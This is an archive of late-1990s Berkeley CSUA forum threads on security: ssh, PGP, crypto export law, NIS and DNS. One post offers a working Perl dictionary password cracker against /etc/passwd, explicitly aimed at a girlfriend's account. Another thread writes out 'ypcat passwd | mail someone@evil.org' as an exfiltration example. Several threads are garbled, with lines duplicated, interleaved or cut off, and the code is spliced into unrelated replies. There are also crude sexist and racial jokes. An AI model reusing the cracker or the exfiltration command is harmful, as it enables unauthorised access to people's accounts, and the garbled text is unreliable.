1/15 Two sys admin questions:
1) How do I disable EXPN in sendmail 8.8.7?
2) Is ssh 1.1 client compatible with ssh 2.0 server?
\_ i think you need to install the old sshd and then tell ssh2d
to accept ssh connections using sshd rather than ssh2d. The
protocols are different and hence are not compatible.
\_ bang yourself on the head with a ball-peen hammer until you
get over this stupid idea that you should disable EXPN. -tom
2) Is ssh 1.1 client compatible with ssh 2.0 server?
\_ i think you need to install the old sshd and then tell ssh2d
to accept ssh connections using sshd rather than ssh2d. The
protocols are different and hence are not compatible. |
| 1999/1/14-17 [Computer/SW/Security] UID:15232 Activity:high |
1/13 Irish lassie makes encryption breakthrough:
URL: http://www.msnbc.com/news/231690.asp
\_ Who cares? The only people who use encryption are pinko commies
and perverts with something to hide . . . and dirty foreigners.
It's no surprise that a foreigner came up with this. I wouldn't
be surprised if she turns out to be a commie.
\_ Gee. If that 16-year-old girl were a Cal student instead,
would you guys say the same thing?
\_ It would depend on whether or not she was a hottie.
\_ She was rather plain but I'm sure soda geeks would be all
over her.
\_ Has it been subjected to any serious peer review? Bruce
Schneier points out that smart people are wont to invent bad
ciphers when they ignore peer review...
\_ It was submitted to a school science fair. (or fare? wtf is the
online dictionary?)
\_ /csua/bin/webster
\_ I would be really interested to see an alternative crypto
algorithm that is "10 times faster than RSA". Unfortunatly
the most technical detail provided by the URL is that she used
2x2 matrices.
\_ Is there a philcrypt? I'll bet that Phillip could kick her
ass without even trying . . .
\_ cnn reported that an unknown American student known only
as "Phillip" appeared at her home in Ireland and kicked
her ass. Witnesses reported that he didn't even work up
a sweat.
\_ There's better info at:
http://slashdot.org/comments.pl?sid=99/01/13/0931237&cid=500
Summary: no big deal
\_ How long does it currently take to encript one piece of email?
If it only takes 1ms or so, it isn't a big deal even if it's ten
times faster, right? How many pieces of email can you send in
one second?
\_ Currently, public-key encryption is too slow to use even for
email -- that's why programs like pgp encrypt your mail using
ordinary private-key encryption, and then use RSA to encrypt
the key.
\_ So how slow is it? Say for a 10KB text email that someone
types up, approximately how long does it take?
\_ How about a 30GB file? Or a few terrabytes? With the rise in
ecommerce and the movement of large amounts of financial data
on the net, this is a serious possibility for a large corp. or
a government. Could also be plans for that new jet fighter. A
marketting campign. Or the Pres. ordering a hit on a foreign
national. Smaller delays are always a good thing if the cost
is zero.
\_ If it's even only "as good as" existing methods, it would be
a great thing, seeing as how
1. It is OUTSIDE the US
2. it is not patent or copyright protected.
\_ My impression was that her "method" was just a speeedup
to RSA, which would mean that you still have to pay
RSA to use it.
\_ I read some pseudo tech stuff from the MIT guys she worked
for and ripped off the core ideas from. It isn't RSA.
\_ Can you give a URL, please? |
| 1999/1/13 [Computer/SW/Security] UID:15221 Activity:nil |
1/12 Can someone point out the URL to download SSH server? Thanks.
\_ http://www.yahoo.com
\_ www.ssh.fi -nolram |
| 1999/1/12 [Computer/SW/Security] UID:15212 Activity:high |
1/11 Anybody know of environmental organizations that needs volunteers
to plant trees year round, and not just on arbor day? I want to
volunteer for such an organization. Any web site or other pointer
would be greatly appreciated.
\_ <DEAD>www.treehuggers.org<DEAD>
\_ <DEAD>www.treehugginghippies.com<DEAD>
\_ Friends of the Urban Forest do it here in SF: http://www.fuf.net -ausman
\_ there's going to be an International Volunteer Conference on Feb 6,7
Im sure they'd have info on tree volunteer stuff. --sly
From: Cal Corps Public Service Center <ccorps@uclink4.berkeley.edu>
Community Service Around the World Conference and Expo
February 6 & 7, 1999
Register early or at the door on February 6th. To preregister,
email conference@lafetra.org and request registration
information.
EVENT LOCATION
MLK Student Union Building, corner of Bancroft and
Telegraph on the UC Berkeley Campus
URL: http://uga.berkeley.edu/calcorps
\_ Thank you all for the pointers! |
| 1999/1/7-10 [Computer/SW/Security] UID:15183 Activity:high |
1/6 Is there a mail program on a unix machine (say, soda) that uses
pgp automatically when you read a mail in a mailbox file.
\_ the latest versions of elm do
\_ How? Can't find mention of pgp in man elm.
\_ Why, do you fear the power of root cow?
\_ modify the sending-filters entry under pine.
\_ the latest versions of elm do
\_ You could easily write a program to watch your mail file for
changes, and encrypt it to a new file when it does change.
In fact you could just hack up biff to do it!
\_ My hacking fu is not strong. Is there a way to use pgp
within pine? I just want to do pgp message wise like
\_ My hacking fu is not weak. Is there a way to use pgp
And if you are root, then just hack your incoming mail program,
not that hard.
\_ My hacking fu is weak. Is there a way to use pgp
within pine? I just want to do pgp message-wise like
some MIME encoding. BTW, what does pgpdecode and pgpencrypt
do? Can't man them.
\_ sigh. do this:
"pgp -kg"
"elm"
The rest is self-documenting.
Oops. After you set your o)ptions to be an intermediate
instead of beginning user in elm, that is.
\_ What is up w/ PGP for UNIX anyway. How come for Windows & Mac,
you can get PGP6, w/ 4096-bit keys, but UNIX world continues
to plod along w/ 2.6.2 w/1024-bit keys.
http://www.pgpi.com for latest versions.
\_ you lose
\_ I think the only difference is the key generator. Just use
the inferior OS version to generate your 4096 bit key but
use pgpi to actually send and receive.
\_ mutt has much better pgp support than elm. -tom
\_ but i like elm better
\_ you lose the popularity contest,
but win a better mailreader |
| 1999/1/6-7 [Computer/Networking, Computer/SW/Security, Computer/SW/Unix] UID:15181 Activity:nil |
1/6 Let's say I do a "netstat -a" and see someone is hogging up a port
that I need (ie. I'm running a MUD server). As a root, how do I
delete the process that is associated with that port? Thanks.
\_ use lsof to get the pid of the process that is using
the port. |
| 1999/1/6 [Computer/SW/Security] UID:15180 Activity:nil |
1/6 Oh, I'll be darned. Say hello to Tawei Liao:
% netstat -a | grep tawei
f4b47800 stream 0 f48ee680 0 /tmp/ssh-tawei/agent-socket-8677 |
| 1999/1/6 [Computer/SW/Security, Academia/StanfUrd] UID:15177 Activity:nil |
1/5 From http://www.finjan.com/wsj2.cfm about the Excel security hole: "We think this is probably the biggest security hole in Internet history," said Bill Lyons, Finjan's chief executive officer. "Any student at Stanford could exploit it." Yup! Only M$ is dumb enough to have created such a huge security hole that even Stanfurd students can exploit it. :-) |
| 1998/12/30-31 [Computer/SW/Security] UID:15146 Activity:kinda low |
12/28 Help crack DES again. http:/http://www.distributed.net \_ oh boy how exciting. Get a fucking life. \_ If you don't like tech projects, don't read the soda motd. \_ Crunching random numbers over and over again is not a tech project. -tom \_ You tell 'em Tom! Crush their will, destroy their ego! You, truly, are the only one who knows anything! Lend us a tiny fleck of your vast wisdom! \_ Although I think the DES cracking project is ridiculous, I don't see anything wrong with others participating. It isn't as if these people are sitting there putting in real effort instead of having lives. They just run the client and hope to get lucky and see their name in lights. What's wrong with that? \_ Plus, hopefully the government will realize the futility of their cryptography export restrictions when DES is cracked in a short enough time (its down to 2 days). \_ Highly doubtful. The previous cracking attempts merely resulted in the US govt. convincing most of Europe & Asia to join in the encryption export stupidity, to make it harder for us to import software. (Besides, most congressmen wouldn't know a DES crack from the giant holes in their heads.) \_ It hasn't started yet, it was just announced. It starts in January. \_ Sillyness about http syntax deleted. It was too silly even for the motd. |
| 1998/12/4-6 [Computer/SW/Security] UID:15065 Activity:high |
12/3 The Wassenaar agreement has been signed; approximately speaking, it
is a treaty which will require other countries to impose US-style
export controls on cryptography. http://www.wassenaar.org
\_ Damn Republicans. They had to start this whole anti-
cryptography crap. I can't believe Clinton actually
supports them too.
\_ Going back to the clipper chip this was always a big
Clinton issue.
\_ It's so ironic that the US is the only democratic government
in the world that is so paranoid about public use of public
key cryptography.
\_ It's for your protection.
\_ If owning a public key is criminal, only criminals will own
a public key.
\_ Outlaw public key crytography. Great, now no one can
use pgp and ssh and people who do 'require' ssh and ssl
(like sysadmins) can't use them anymore. And yes there
are a lot of non-government systems that do require
encryption. Speaking of protection, do you think if
you outlaw pub key crytography that criminals or
terrorists won't try to get there hands on it. Now
you've just outlawed legitimate use of the technology
and let criminals use it. Read up on it more and
you'll see why outlawing it is such a bad idea.
/ftp/pub/cypherpunks
\_ I think you are responding to a joke.
\_ Yes, it was a joke. Too bad some people just don't
get it. Lighten up folks.
\_ ah yes, that was just so hillarious i forgot to
laugh.
\_ No, you're just a friggin' idiot with no sense
of humor and lacking the slightest shred of what
might pass for intelligence at the dismal pit
Berkeley has become at the undergraduate level.
\_ tom, is that you again? What did I tell
about judging other people's sense of humor
\_ If I was a criminal and I really wanted strong encryption why
couldn't I just code up the RSA public key cryptography algorithm?
Granted it might take a little while but my point is that anyone
who wants strong cryptography can write it themselves.
Do the anti-crypto people have an argument against this?
\_ It's not as easy as it seems to code these algorithms. There's
on cryptography. Nevertheless, he studied in enough
all kinds of attacks that don't necessarily involve breaking
the underlying math. It's definitely possible, but I think
that it's only feasable for criminals who can hire people with
the appropriate fu. - mikeym
\_ Actually, it is as easy as it seems. The original creator
of PGP was Phil Zimmerman who himself was not an expert
on cryptography. Nevertheless, he studied it in enough
and consulted enough people about any loopholes in his
program that he finally came up with a product that is
now widely used. All from a joe schmo who graduated
from U.Florida with a B.S. in computer science.
\_ I don't think that PGP has the NSA quaking in its boots.
\_ But the threat of public key cryptography comes not from
individual terrorists (I don't think Timothy McVeigh
used pgp) but from other countries and their military,
which are competent enough to implement a robust
cryptographic system if they wanted to without the help
can keep recompiling and changing the key size
of anyone in the US. Which is why banning public key
cryptography is pointless.
\_ Yes, this is true, but my point was that it requires
more than the common criminal can do. Not just "anyone"
can do it. I would even guess that many governments would
have trouble outsmarting the NSA. - mikeym
\_ The "common" criminal is a purse snatcher or car
jacker. It's likely the only computer they ever owned
was the one stolen from your apartment.
\_ Read what I was replying to: "anyone who wants
strong cryptography can write it themselves." This
is FALSE. It requires a lot of knowledge and
intelligence. That was my WHOLE point. - mikeym
\_ You didn't have a point.
\_ Any moron can download and compile the
int'l version of PGP. And of course they
can keep recompiling and increasing the key size
(for use amongst themselves) forever.
\_ PGP is the height of security?
\_ It's "pretty good", no more, no less.
\_ So it is not a technical problem but a money one? -jon |
| 1998/11/23-1999/2/2 [Computer/SW/Security] UID:15002 Activity:nil 58%like:14964 |
11/15 Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg |
| 1998/11/19 [Recreation/Computer/Games, Computer/SW/Security] UID:14981 Activity:nil |
11/19 http://www.gamecenter.com/Reviews/Item/0,6,0-2289,00.html?st.gc.fd.gca \_ Oh. My. God. |
| 1998/11/15-23 [Computer/SW/Security] UID:14964 Activity:nil 58%like:15002 |
11/15 Dealing with people who get their passwords sniffed is a waste of the
CSUA's time. Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg |
| 1998/11/14-16 [Computer/SW/Security, Computer/SW/Unix] UID:14955 Activity:nil |
11/13 What's up with the following? just a routine passwd change...
http://soda.CSUA.Berkeley.EDU% passwd
Error: /dev/d0f3 Failure level 2
\_ This means they just posted your password & login to the net. |
| 1998/11/14-16 [Computer/SW/Security] UID:14954 Activity:moderate |
11/13 I have a text file that I want to have a leggaly admissible time stamp.
This should be easy with some type of public key. Is there a service
like that?
\_ I don't think there exist any such electronic notary service.
If the recipient trusts you then you yourself can put a time
stamp on the text file and then you can use pgps to sign it.
Therefore your recipient knows that there's only one person
that can medle arount with the time stamp.
\_ There is no specific recipient --- it's not an email message.
I just need to prove that I created it on some specific day.
\_ print it out and take it to a notary.
\_ Is there no electronic/"hi tech" way to do it?
\_ case law too new, risky to do it high tech unless you are
Novell/MS/etc. and have $ lawyers - do it old-fashioned way |
| 1998/11/13-16 [Computer/SW/Security] UID:14952 Activity:nil |
11/13 How do people deal with pgp under multiple accounts? Do they
simply recreate a new key all together or do they use the same one?
Also, if you change things like your email address or passphrase
do you have to redistribute your public key all over again or
can your corresponents use the same key. thx. --pgp hozer
\_ Is that you, mark? |
| 1998/11/13-16 [Academia/Berkeley/Classes, Computer/SW/Security] UID:14950 Activity:nil |
11/12 Wow, further proof that our dorms aren't as bad as we
thought:
http://www.nytimes.com/library/tech/98/11/circuits/articles/12prin.html
\_ Unit 2 Cunningham has had this since '92.
\_ got a username/passwd for us to use?
\_ cypherpunk/cypherpunk
\_ just create one for yourself
\_ It's free. Try this:
http://verify.nytimes.com/subscribe/sub-bin/new_sub.cgi
\_ What's that sound? Is that the sound of freedom being chipped
away, bit by bit? What's that? It's for my safety? Gee, thanks.
\_ Anyone know the detection range for our prox cards? Is it the
~3 cm you have to get to the readers to get them to unlock the
door, or could they be read from a longer distance in theory? |
| 1998/11/3-4 [Computer/SW/Security] UID:14887 Activity:high |
11/3 Is the latest ssh bug really worth deinstalling it? My friend and
I are having an arguement over this point. A URL on the subject:
http://news.freshmeat.net/readmore?f=ssh-vulnerability --ssh h0zer
\_ No definetly exploitable vulnerability has been found yet
Until one is, you're much better off using it than not
\_ Your machine is safer with no login mechanisms, not even
ssh. In fact, its even more secure if you unplug it from
the net, unplug it from power, lock it in a safe, and bury
\_ Your machine is safer with no login mechanisms, not eve
\_ But even then your host can still be easily compromised
through the use of brute-force methods. If you're really
concerned, the best solution is to not buy a computer at
ssh. In fact, its even more secure if you unplug it fro
the net, unplug it from power, lock it in a safe, and bur
that safe beneath your home
\_ but then I miss out on all the cash I get from
\_ But even then your host can still be easily compromise
\_ IBM has specially denied the assertion that it had ever
uncovered an exploitable bug in ssh, and is complaining
about rootshell's unethical use of a minor advisory which
does not appear to detail any real security threat. So the
through the use of brute-force methods. If you're reall
concerned, the best solution is to not buy a computer a
all. Go outside and enjoy the blue sky and sunshine -
you'll have all that extra pocket cash to take with you
\_ fresh air smells funny. i think i'll stay inside soda
\_ but then I miss out on all the cash I get fro
cracking other peoples' ssh-guarded firewalls
\_ IBM has specially denied the assertion that it had eve
uncovered an exploitable bug in ssh, and is complainin
about rootshell's unethical use of a minor advisory whic
does not appear to detail any real security threat. So th
people who supposedly found the bug say there is none |
| 1998/11/2-3 [Computer/SW/Security] UID:14876 Activity:kinda low |
11/2 IMAP service (finally) available on UCLink4. See:
http://weblink.berkeley.edu:8000/imap.html for details.
\_ It's been there for a while, but they only just announced it.
Has anybody tried it? |
| 1998/10/13-15 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:14769 Activity:low |
10/12 Is there a web site for the Spanish channel Ch14? Thanks.
\_ http://www.univision.com
\_ But that's a company called VisiCom which makes video
hardware. |
| 1998/10/12-14 [Computer/SW/Security, Computer/SW/Unix] UID:14767 Activity:kinda low |
10/12 Is is true that if a user account is comprmised on a network of computers
running NIS, the entire network of computers running NIS are compromised?
\_ It will allow people to "ypcat passwd | mail someone@evil.org",
which should be considered a problem. This is probably what whoever
said that was thinking of.
\-well, that isnt really enough info to make any guesses but
my guess would be "if the user can log into one NIS client,
the login in probably valid on other clients which would need
to be checked out". the more involved question is "if someome
breaks root on a NIS client, what are the implications for the
whole domain". --psb
\_ Not "enough info to make any guesses"? The quality of
users' password choices has not gotten any better over time,
and Crack still works (even better, now that computers are
faster).
\-i mean the poster hasnt provided enough info for an
answer ... we cant really guess what the question means. --psb |
| 1998/10/8-11 [Computer/SW/Security] UID:14752 Activity:kinda low |
10/7 I want to use a console based ssh on my NT machine (i.e. so
that I can run ssh in a MSDOS shell). I have found 1 program
but that didn't have vt100 support. Any pointers?
(Why do I want to do this? Because I want to use econsole
and not the ugly FSecure ssh terminal).
\_ set up a port forward for port 23 and use whatever telnet client
you like. -tom
\_ But then is there a console based telnet for NT?
The standard telnet will pop up another window.
\_ SecureCRT baby, worth every penny. http://www.vandyke.com
\_ Or teraterm, also worth every penny but much cheaper.
http://www.zip.com.au/~roca/ttssh.html
\_ Teraterm is better than FSecure or SecureCRT, IMHO.
Suggested changes: turn off cursor blinking in the .ini
file (it's not one of the GUI configurable options), and
steal the font from CRT/SecureCRT as it's the one xterms
use and looks much nicer than your default options. Also
turn off the menu.. hey.. you don't really need it --dbushong
\_ But can teraterm have transparent backgrounds
like econsole?
\_ Now seems as good a time as any to ask why
the fuck you're running windows.. --dbushong
\_ It has source. there fore, if you have clue
and time, it can have that.
\_ Anyone know of any Mac SSH software besides F-Secure?
\_ NiftyTelnet SSH.
\_ URL? --dim
\_ http://www.lysator.liu.se/~jonasw/freeware.html Note that
it's technically illegal for use in the US of A. I'm
distribution of th SSH-enabled beta is on hold:
actually looking forward to the SSH enabled version of
BetterTelnet, which is a really nice Mac telnet client, but
distribution of the SSH-enabled beta is on hold:
http://www.cstone.net/~rbraun/mac/telnet/beta/ssh.html |
| 1998/10/3-5 [Computer/SW/Security] UID:14728 Activity:nil |
10/3 Has anyone bought stuff from InDirect? They seem to have really
cheap prices. How about Hi-Tech USA? I don't really give
crap about customer service. I know exactly what I want
already.
\_ if you don't care about service then why are you asking? |
| 1998/9/24-26 [Computer/SW/Security] UID:14665 Activity:high |
9/24 How do I find out what machines are in a certain domain, e.g.
http://laney.edu? Thanks.
\_ ping -f http://laney.edu
\_ a little command many people forget about: host -l http://laney.edu
\_ echo "What machines are in your domain?" | mail postmaster@laney.edu
\-You have to be so tall ... /tmp/laney.edu --psb
You could try to use nslookup's ls command to list everything in the
domain, but most nameservers (including http://laney.edu's) won't let you.
\-"You have to be this tall ... " ... /tmp/laney.edu --psb
\_ you could get a map of what network addresses they use, and then
try to get reverse dns mappings for everything in those addresses.
This is why disabling zone transfers on a nameserver (i.e. ls)
is pretty stupid unless you kill reverse dns too. -ERic
\_ Disabling zone transfers stops the script kiddies for now
(until someone takes pity on them and writes them a script
to do things the hard way)
\_ so until then you end up making it harder on everyone
else.
\_ stupidity in the name of security is rampant.
See soda's relaying policy. -tom
\_ most everyone else doesn't need to do a zone xfer
or can ask nicely for one
\_ Disallowing them is a security through obscurity
policy, and impedes curiosity. It's like turning
off finger on Unix. Besides, crackers can still
scan easily, even without using DNS.
\_ or it's like using shadowed passwords
\_ WTF are you smoking!? Non shadow-passwd
files are a huge security hole. Give
any user on your system instant access
to all the poor sops' accounts and files
who can't pick a decent password.
\_ unshadowed passwrds aren't the
cause of the security hole, stupid
users are
\_ shadowed passwords provide little real
security; it's not difficult to get the
shadow file without root. -tom
\_ Um, by that logic, it's not hard to get
root, so why bother having any security
at all --dbushong
\_ Tom, you were the one who suggested
using shadowed passwds and have, until
now, continued to do so on the basis that
it was "more secure" for at least 4 years
now, see CSUA/OCF/XCF Help Session handout
by Tom Holub
\_ I haven't updated that in quite
some time; I haven't taught the
security help session in something
like 3 years. At the time, I
wasn't aware that programs such as
ftpd can leave large swaths of the
shadow file in core dumps. -tom
\_ That's not the logic. The logic is that
shadowed passwords provide a false sense
of security. The security problem with
non-shadowed passwords is having bad
passwords; having shadowed passwords does
little or nothing to alleviate the only
problem it could theoretically solve. -tom
\-i think turning off zone xfers is
basically free to do. of course you
shouldnt rely on it and what is really
the important thing to do is to be able
to see who is asking forone and what
they do right after that. a zone xfer
a pretty good indicator of certain
types of scans/signatures of certain
tools. --psb
\_ Or just curious network users.
E.g. zone transfer of various
things under http://mit.edu is fun.
\_ Please define "zone transfer" -- clueless
\_ Simple answer: it's what you get when you run
host -l or nslookup ls. Long answer: Read the
BIND book from O'Reilley |
| 1998/9/23-24 [Computer/SW/Security] UID:14655 Activity:high |
9/22 Any chance of getting ssh2 installed? not clobber ssh1, but just
have ssh2 available so that we might be able to access other
systems, pretty please? I'll do it if you gimme the root passwd!
\_ You don't need to be root. Just compile it in your home directory
and delete the source tree once you'r done. The README tells you
how to do it. Or better, put it in some shared directory so
everyone has access to it. The only bummer is that you can't get
the daemon to work without being root.
\_ What's the diff?
\_ ssh2 uses the ssh 2.0 protocol which is more secure
some ssh2 servers won't accept ssh1 connections
\_ does that mean that they won't accept telnet/rlogin
sessions since those are less secure. An ssh2.0
only server - that's unheard of. Stop tabbing so
\_ It's what you get if you install sshd2 and don't
set it up to call sshd1 to handle old connections.
The sshd2 software only knows how to handle ssh 2.0
protocol.
far to the right.
\_ It's not unheard of and it makes great sense. --dim
\_ Some cs servers (like torus.cs) only accept ssh
& kerberos connections - no normal telnet/rlogin
\_ This is a good policy and should be expanded
(at least when there are more free
implementations of SSH).
\_ originally, there was a problem with the ssh2 licensing that
made it okay (without paying for licensing) to say have sshd
running on a machine if say people were going to login and
use the machine for homework but not necessarily so for
machines like restricted access fileservers and nameservers
that only administrative people needed (or could) log into.
This may have changed since ssh2 was first released. --jon
\_ It's still quite far from a free software license. See
/tmp/SSH-LICENSE, if you want all the gory details; there
is a project to create a genuinely free replacement. -- schoen |
| 1998/9/22-23 [Computer/SW/Security, Computer/SW/OS/FreeBSD, Computer/SW/Unix] UID:14648 Activity:high |
9/22 look what i wrote. have fun cracking your wanabee gf's password!
\_ and getting kicked off of soda
\_ This assumes that you have a user readable passwd file.
\_ or non-shadowed passwd, like soda's
\_ /etc/passwd must be world readable, so the
#!/usr/bin/perl
$twink = $ARGV[0];
open(PASSWD,"/etc/passwd");
do {
$line = <PASSWD>;
($user,$passwd) = split(/:/,$line);
} while ($twink ne $user);
close(PASSWD);
$salt = substr($passwd,0,2);
$passwd = substr($passwd,2,);
foreach $attempt (`cat /usr/dict/words`) {
chop($attempt);
if($salt.$passwd eq crypt($attempt,$salt)) {
print "password is: $attempt\n";
exit(1);
}
}
print "Unable to crack password\n";
"user readable passwd" implies non shadowed
\_ soda has a shadowed passwd file. all 4.4 bsd derivatives
have such a mechanism. most modern unix like os's do.
only older's like ultrix, older irix, <= 4.3 bsd derivs
\_ even ultrix has shadowed passwds
\_ I am not sure if I would call that
monstrosity a passwd file, but okayn in that
case, I amend my earlier statement to include
ultrix and sunos as shadowable --jon
\_where does soda keep its shadow passwd's?
\_ where no one but the people with enough clue
to RTFM can find them
\_ Alec Muffett >> you
\_ /usr/dict/words is a lame dictionary - real crackers use much
much larger dictionaries
\_ Real crackers kidnap the person, tie him/her up, and beat
the shit out of him/her until (s)he gives you the password
\_ REAL crackers get root shell...
\_ True crackers don't bother with gf's account. They
sift through her lingerie drawer for a diary
(amongst other items...)
\_ CSUA crackers sift through her lingerie drawer
and wear it.
\_ Free Kevin Mitnick! |
| 1998/9/4-5 [Computer/SW/Security] UID:14546 Activity:nil |
9/4 I'm going to school at MIT now and they make you pay to
connect to the campus network. Does Berkeley still provide
free access? Also can anyone suggest some good ISPs in the
Cambridge/Boston area? Thanks. -emin
\_ berkeley's is 642-9600. you need to get an account first at
http://www-uclink.berkeley.edu (they combined the forms for homeip and
email) or you could try to telnet to <DEAD>hip.berkeley.edu<DEAD>. |
| 1998/9/3-7 [Computer/SW/Security] UID:14538 Activity:nil |
9/3 I remember on UCTwink, when I logged in, it would tell me how many
previous unsuccessful login attempts, if any, there were. Is there
anything similar on CSUA?
\_ Nope, though they could simulate it using the system logs, or by
patching login. But you should be using SSH... -- SSH h0zer |
| 1998/8/26-27 [Computer/SW/Security] UID:14518 Activity:moderate |
8/26 ssh 2 now released -jon (usu place, usu way) -jon
\_ Damnit, i just finished installing the old one on my computer.
you should have told me sooner.
\_ local mirror? And what new features/security holes doe sit have
that we should be upgrading it to for?
\_ I had trouble getting to the ftp site since net to finland
is a little slow. It implements the ssh2 protocol which is
on the IETF standards track. read comp.security.ssh for
more info --jon
\_ I'm sure. So is there a local copy here you're willing to
share?
\_ You want to upgrade your client so you can talk to new ssh2 servers,
but don't want to upgrade your servers until everyone has the new
client as they don't play nicely with older clients.
\_ ssh 2 server can serve ssh 1 clients, sort of. You keep
sshd1 around, and ssh 2 can call it, if it's configured to.
--PeterM |
| 1998/8/26 [Computer/SW/Security, Computer/SW/Unix] UID:14511 Activity:high |
8/26 "I have a problem with extracting from a .tar file.
When I archived it,
\_ Use gnu tar.
\_ you should finish your question.
tar xvf foo.tar to extract files
tar cvf foo.tar foo to archive directory foo into foo.tar
tar xzvf and czvf will handle tar.gz files.
\_ I would have finished my sentence, but
\_ I think the best bet is if you
\_ Yeah but that won't work becau"
\_ Let me complete the part of the question that was deleted by
someone.
I unthoughtfully archived from the root directory using
"tar", but now I am under a different directory system and
I am not root. So I have trouble extracting from the archived
file. Could anyone please suggest a solution? Thanks!
\_ give more details (do you have root access on this new
machine? what error msgs are you getting? why are you
trying to archive starting at the root directory and
untaring it to another machine. From the info you put
above no one can help you and will only make fun of you
like the cock sucker below.
\_ You don't have to be root to untar the damn file.
untar it somewhere else. Wanting to write to the
root directory w/o root access is NOT a tar question.
But it makes sense that you don't have root access.
People w/o a clue shouldn't have root access.
\_ He's asking how to untar it somewhere else, you idiot.
\_ No, you moron. He meant root directory on a
different system. |
| 1998/8/26-27 [Computer/SW/Security] UID:14510 Activity:kinda low |
8/26 How do you get fetchmailrc to retrieve mail from uclink4 using
ssh?
\_ how's about "ssh uclink4 -L 9660:uclink4:110 -f" then have fetchmail
POP to port 9660. -nick
\_ You're tool cool.
\_ If you don't do "-L 9660:localhost:110" then you're traffic
will still go out on the local uclink4 network unencrypted.
-randal |
| 1998/8/23-25 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:14498 Activity:nil |
8/22 The Commission on Campus Computing report is now public.
You can see it at http://ls.berkeley.edu/coc/report.html.
Salient points (these are all recommendations--they have not
been and may not be approved by the Chancellors):
* Computer ownership should be required for new students starting in
2000.
\_ not everyone can afford a computer.
\_ This is becoming less and less true. (Read the report.)
\_ If a computer is made a requirement, students can make it
part of their financial aid package. -tom
* Network connections should include a monthly charge starting in 1999.
* All courses should have at least a skeletal web page.
* All students should have a single account which includes
disk space and Web access and which stays with them for the
duration of their time at Cal.
* IS&T should be moved under Carol Christ, and a new head of
"Educational Technology" should be created.
-tom |
| 1998/8/21-22 [Computer/SW/Security] UID:14493 Activity:very high |
8/21 My supervisor asked that everyone in the office release their
e-mail password to her. I don't feel comfortable doing that, and
was wondering if there is some sort of UCB e-mail policy about
not releasing passwords that I can quote in response to her request.
\_ Your boss has no right to require that you give them your
password. root has the right to have full access to your
account but that's a different story. Don't do it. Tell him
shoove it up his ass if he forces you to.
\_ root has the ability, but not necessarily the right, to
full access to your account. (If at a UC or ISP, root
is prohibited from reading your e-mail for instance.)
\_ Just say "NO WAY IN HELL"
\_ You are F..I..R..E..D!!!! (do I smell million dallar law
suit?)
\_ Is it your personal email account or work account? Either one,
you have to right to not to. You should ask her her reason for
knowing password.
\_ It is my csua account which I also use for work. What
I am looking for is some sort of csua or ucop rule that
says I am not obligated to give her my password.
\_ CSUA policy forbids you from allowing anyone
else to have your password or use your account.
If she wants a password to your work e-mail,
make her give you a work e-mail account. --root
\_ in fact CSUA root will turn your account off
should we find that this is the case. --jon
\_ Employers have a legal right to access to your office workstation
and business related accounts. That does not extend outside the
office. Forward your mail outside and tell her to shove it.
If they forbid you from forwarding your mail outside the company,
be very careful what email you do with your business address. BIG
UC Policies. --jon
BOSS is WAtching YOU. -ERic
\_ But the UC/UCB e-mail policy protects the privacy of
UC employee e-mail - see
http://socrates.berkeley.edu:7015/policy
\_ Your *e-mail* is protected, but your *password* is
not. In fact there is a campus policy that
your supervisor *must* have all the passwords you
use for business purposes (if you're UC staff).
They just can't look at it except under the
situations outlined in the e-mail and other
policies. -tom
\_ No, root never knows what your passwords
are. Having passwords stored anywhere on a
computer comprimises security. Passwords on
/etc/passwd or /etc/shadow are one way
encrypted so there's no way to derive
the original passwords without a password
cracker and a high performance computer.
\_ A 386 is powerful enough
to crack many passwords.
\_ I didn't say root, I said "your
supervisor". -tom
\_ Boy imagine that, UC managers who do not understand
or are not aware of UC Policies. --jon
btw, if you want a wider discussion, there is also
http://ucb.net.discussion. I am sure some of the more
security minded denizens of that newsgroup will have
some interesting opinions on this topic.
\_ Well its nie the the UC at least grants some expectation
of privacy to employee email. I'm just pointing out that
in the 'real world' of employment, it can be very
different. -ERic
\_ I think she likes you!
\_ I think so too!!
\_ She's married and I'm a girl. Hence, I don't think so.
\_ She could be bisexual.
\_ How about giving me your password. I am not married
and I am a guy and not gay.
\_ which company is this? |
| 1998/7/30 [Computer/SW/Unix, Computer/SW/Security] UID:14416 Activity:very high |
7/30 Where the heck is kchang? I need my daily dose of idiocy.
\_ WHITEY GO HOME
\_ Oh my god, they killed kchang! You bastards root!
\_ Is that what /csua/adm/bin/sorry means?
\_ Yes...I killed him cuz I was on his watch list. My
accomplice helped me cuz he was not on his watch list.
\_ Sorrying kchang is morally equivalent to slavery and
discrimination against the black man! Just because you
lily-white root bastards no longer keep black people in
chains and let millions of mexicans across the border every
day, you think "nobody can see us discriminating in all these
other ways in which we used to discriminate . . . so its okay
to sorry kchang because were are being so good and nobody
will notice!!!!!!!" You are wrong!!!!! I WILL NOTICE!!!!!!
\_ I didn't write this; I don't endulge myself in the
gratuitous use of exclamation points -(fucker)
\_ In this context, the use of additional exclamation
points is quite correct. It emphasizes the mental
anguish and suffering of an AGGRIEVED MINORITY!!!!!!
WHITEY (root) WILL PAY!!!
\_ kchang left soda to devote his full attentions to a career in the
bath-house management industry.
\_ i.e. he went to take a shower?
\_ you guys are too sarcastic. |
| 1998/7/29 [Computer/SW/Security] UID:14409 Activity:nil |
7/27 Does anyone know why there are two different versions of pgp on
instructional machines? There seems to be the version where
everything is done through the single pgp command and the other
version that's split up into pgps, pgpe, pgpk, etc..
\_ PGP 2.6 (as well as 2.3) == pgp
PGP 5 == pgps, pgpe, pgpk
\_ where do you get this pgp 5? I thought csua's ftp site was
supposed to contain the most up-to-date version but they
only seem to go up to 2.6 (/ftp/pub/cypherpunks/pgp/)
\_ it's commercialwarez
\_ source is still available although many people think
PGP is selling out. Get it from http://www.pgpi.org
worldwide, e.g. cypherpunks FTP is NOT maintained now.
\_ SWW on the HP's & DEC's is run by the dept. and is stagnant due
to lack of employees to maintain it. SWW on the Solaris x86
machines is maintained by root@cory and is much more up to
date (making it wildly inconsistent with the other machines).
\_ Ahh, but I am pushing the sww people to get there stuff more current.
First on the plate is emacs then a bunch of the gnu utilities. --marc
\_ Good luck! There simply aren't enough people and PGP sure as hell
isn't a high priority. Push all you like. Into /dev/null.
Don't waste your time trying to get SWW to do anything, just
build your own. -been there, done that |
| 1998/7/27-29 [Computer/SW/Security, Computer/SW/Unix] UID:14400 Activity:high |
